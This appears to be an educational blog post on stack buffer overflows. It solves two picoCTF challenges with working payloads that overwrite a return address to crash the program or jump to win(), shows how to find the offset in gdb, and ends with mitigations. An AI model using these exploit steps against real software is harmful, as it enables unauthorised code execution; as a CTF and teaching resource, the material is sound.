Buffer overflow

“O’erstep not the modesty of nature.”

- Hamlet, Act III, Scene II

Buffer overflow, a vulnerability class that was widely exploited in the 2000s, occurs when data is copied into a buffer that is too small to hold it. The excess bytes overwrite whatever is stored at the adjacent addresses, which can let an attacker make the program execute instructions the programmer never intended.

In this blog we will discuss how buffer overflow works, solve a few challenges in picoGYM, and conclude with the newer protections that prevent exploitation of this vulnerability.

Note: All the code below was executed on an Ubuntu machine. To follow along, it is recommended to have a Linux distro or WSL installed.

Buffer overflow

Let's start with a basic example of a buffer overflow by executing the program below:

[Figure: source listing of buffer-overflow.c]

To execute the program and observe the buffer overflow, we have to disable a few protections (we will cover them in the last section of the blog): the stack canary with -fno-stack-protector, PIE (Position Independent Executable) with -no-pie and -fno-pic, and the non-executable stack with -z execstack.

Compile and run the program on a Linux machine using:
> gcc buffer-overflow.c -fno-stack-protector -fno-pic -no-pie -z execstack
> ./a.out

First, note the difference between the addresses of a and buffer. On my system it is 44 bytes; the exact value depends on the padding the compiler adds. Knowing this distance, we can modify the value of the variable a. Don't believe it? Try it: take the difference you got and add one to it (on my system, 44 + 1 = 45). Now let's execute:

> python3 -c "print(45 * 'a')" | ./a.out

The value of a you get is 97, the ASCII code of 'a'. Complete output for your reference:
> python3 -c "print('a' * 45)" | ./a.out
Difference: 44 bytes
Data: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Value of a: 97

So what happened? The buffer overflowed, and the 45th byte was written to the memory address of a, hence the modified value. We can also cause a segmentation fault by overwriting the return address of the main function itself.
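The overwrite can be reproduced with a toy model of the stack frame. This is only a sketch in Python, not the original C program: the frame layout, the names BUFFER_OFFSET, A_OFFSET and FRAME_SIZE, and the assumption that a starts at 0 are all made up for illustration. Only the 44-byte distance comes from the run above.

```python
import struct

BUFFER_OFFSET = 0   # hypothetical position of buffer inside the frame
A_OFFSET = 44       # distance between buffer and a reported by the program
FRAME_SIZE = 64     # arbitrary frame size for this model


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy data plus a terminating NUL into the frame without any
    bounds check, which is how gets() treats its destination."""
    payload = data + b"\x00"
    frame[BUFFER_OFFSET:BUFFER_OFFSET + len(payload)] = payload


def read_a(frame: bytearray) -> int:
    """Read the 4-byte little-endian int stored at A_OFFSET."""
    return struct.unpack_from("<i", frame, A_OFFSET)[0]


frame = bytearray(FRAME_SIZE)      # assumption: a is initially 0
unchecked_copy(frame, b"a" * 44)
print(read_a(frame))               # 0: only the NUL terminator reaches a
unchecked_copy(frame, b"a" * 45)
print(read_a(frame))               # 97: the low byte of a is now ord("a")
```

With 44 bytes of input only the string terminator lands on a, so its value stays 0; the 45th byte is the first one that changes it.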

Challenges

Now let's solve our first challenge

Launch the instance and download the binary and the source. Let's begin the exploit.
Checking the file type:
> file vuln
vuln: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=b53f59f147e1b0b087a736016a44d1db6dee530c, for GNU/Linux 3.2.0, not stripped

> checksec --file=vuln

[Figure: checksec output for challenge 1]

Since there is no stack canary, we can overflow a buffer without being detected. The source code shows that the flag is printed by the sigsegv_handler function, which is triggered on a segmentation fault. We can cause one by overwriting the return address, so that the program jumps to a memory location that is not mapped by the process. Sending a long enough run of a's does the job; the exact number depends on the padding, and there are ways to find it (we will do that in the next challenge). The flag can be recovered by executing the command below in the picoGYM Webshell:
> python3 -c "print(32 * 'a')" | nc saturn.picoctf.net <YOUR_INSTANCE_PORT_NUMBER>

Flag recovered: picoCTF{ov3rfl0ws_ar3nt_that_bad_c5ca6248}


Now for the second challenge. Launch the instance and download the binary and the source. Let's begin the exploit.
Checking the file type:
> file vuln
vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=685b06b911b19065f27c2d369c18ed09fbadb543, for GNU/Linux 3.2.0, not stripped

> checksec --file=vuln

[Figure: checksec output for challenge 2]

Since there is no stack canary and PIE is not enabled, we can find the fixed address of any function and overwrite the return address on the stack with it to jump to that function. Inspecting vuln.c tells us that the function of interest is win(). How do we know the offset of the return address? There is a trick: we choose the payload wisely, so that once we read the contents of EIP (the instruction pointer) after the crash, we can calculate the offset and place the new return address at that position.

The payload we will use to find the offset is aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaaa (we can cut it short, as we are sure to overflow the buffer and overwrite the return address within 64 bytes). Every 4-byte chunk of this payload is unique, so the value of EIP tells us the offset. For this particular program it was 0x6161616c. x86 is little-endian, so the least significant byte (0x6c, 'l') is the first one in memory, and the value translates to laaa. The offset is therefore 4 * (ascii(l) - ascii(a)) (you can remember this as a rule), which evaluates to 4 * (108 - 97) = 44. So the first 44 bytes are padding and the next 4 bytes are the address of win(). To find the offset, we run the program inside gdb, feed it the pattern, and inspect the registers after the crash:
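The offset rule can be checked with a short Python sketch. The helper names make_pattern and offset_from_eip are made up for illustration; the pattern layout and the EIP value 0x6161616c are the ones used in this post.

```python
import string
import struct


def make_pattern(chunks: int = 26) -> bytes:
    """Build 'aaaabaaacaaa...': each 4-byte chunk is one distinct
    lowercase letter followed by 'aaa'."""
    letters = string.ascii_lowercase[:chunks]
    return "".join(letter + "aaa" for letter in letters).encode("ascii")


def offset_from_eip(eip: int, pattern: bytes) -> int:
    """Return the index in pattern of the 4 bytes that ended up in EIP,
    or -1 if they do not occur in the pattern."""
    chunk = struct.pack("<I", eip)   # little-endian: low byte comes first
    return pattern.find(chunk)


pattern = make_pattern()
print(pattern[:16].decode())                  # aaaabaaacaaadaaa
print(offset_from_eip(0x6161616C, pattern))   # 44
```

Searching the pattern for the bytes gives the same answer as the 4 * (ascii(l) - ascii(a)) rule.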

> gdb ./vuln
Please enter your string:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaa

> (gdb) info registers
eip      0x6161616c       0x6161616c

[Figure: register values in gdb]

The calculated offset is 44. To get the last 4 bytes of the payload, we disassemble win() and take its address:

> (gdb) disass win
0x080491f6 <+0>:    endbr32

The final payload is 44 * b"a" + b"\xf6\x91\x04\x08" (the address bytes appear in reverse order because the system we are exploiting is little-endian):

> python3 -c 'import sys; sys.stdout.buffer.write(44 * b"a" + b"\xf6\x91\x04\x08\n")' | nc saturn.picoctf.net <YOUR_INSTANCE_PORT_NUMBER>
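Instead of reversing the address bytes by hand, the payload can be assembled with struct.pack. This is a minimal sketch: build_payload is a made-up helper name, while the offset and the address of win() are the values found above.

```python
import struct

OFFSET = 44                # bytes before the saved return address (from gdb)
WIN_ADDRESS = 0x080491F6   # address of win() taken from the disassembly


def build_payload(offset: int, address: int) -> bytes:
    """Padding, then the 32-bit address in little-endian order,
    then the newline that ends the input line."""
    padding = b"a" * offset
    return padding + struct.pack("<I", address) + b"\n"


payload = build_payload(OFFSET, WIN_ADDRESS)
print(payload[OFFSET:OFFSET + 4].hex())   # f6910408
print(len(payload))                       # 49
```

The "<I" format means "unsigned 32-bit, little-endian", so the byte order is handled automatically if the address changes.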

Flag recovered: picoCTF{addr3ss3s_ar3_3asy_6462ca2d}

New Practices

Now for the last section, we will just mention a few techniques that mitigate these attacks; there are others which you can check out.

Stack canary (stack protector): The compiler places a canary value between the local buffers and the saved return address. An overflow that reaches the return address has to overwrite the canary first; the function checks the canary before it returns and terminates the program if the value has changed.

Position Independent Executable (PIE): Allows the kernel to randomize the address at which the code is loaded, so we cannot use the hardcoded addresses we get from the disassembly.

Check for bounds: The gets() function doesn't check bounds. Alternatives such as fgets() take the size of the buffer as an argument and never write past it.
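The canary and the bounds check can be illustrated with a toy model of a stack frame. This is a sketch only: the Frame class, the buffer size, the fixed canary bytes, and the return address are all hypothetical. Real canaries are chosen randomly when the process starts and are checked by compiler-generated code.

```python
BUF_SIZE = 32                 # hypothetical buffer size
CANARY = b"\x00\xde\xc0\xad"  # hypothetical fixed value; real ones are random


class Frame:
    """Toy frame laid out as [ buffer | canary | return address ]."""

    def __init__(self, return_address: bytes):
        self.memory = bytearray(BUF_SIZE) + CANARY + return_address

    def unchecked_write(self, data: bytes) -> None:
        # Models gets(): every supplied byte is written, whatever the size.
        self.memory[:len(data)] = data

    def bounded_write(self, data: bytes) -> None:
        # Models fgets(buf, BUF_SIZE, stdin): at most BUF_SIZE - 1 bytes
        # are stored, followed by a terminating NUL.
        kept = data[:BUF_SIZE - 1] + b"\x00"
        self.memory[:len(kept)] = kept

    def canary_intact(self) -> bool:
        return bytes(self.memory[BUF_SIZE:BUF_SIZE + 4]) == CANARY


frame = Frame((0x08049000).to_bytes(4, "little"))  # made-up return address
frame.bounded_write(b"a" * 40)
print(frame.canary_intact())    # True: the write stopped inside the buffer
frame.unchecked_write(b"a" * 40)
print(frame.canary_intact())    # False: the overflow ran over the canary
```

In the second case a protected binary would abort before returning, so the overwritten return address is never used.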


Code for buffer overflow: buffer-overload.c
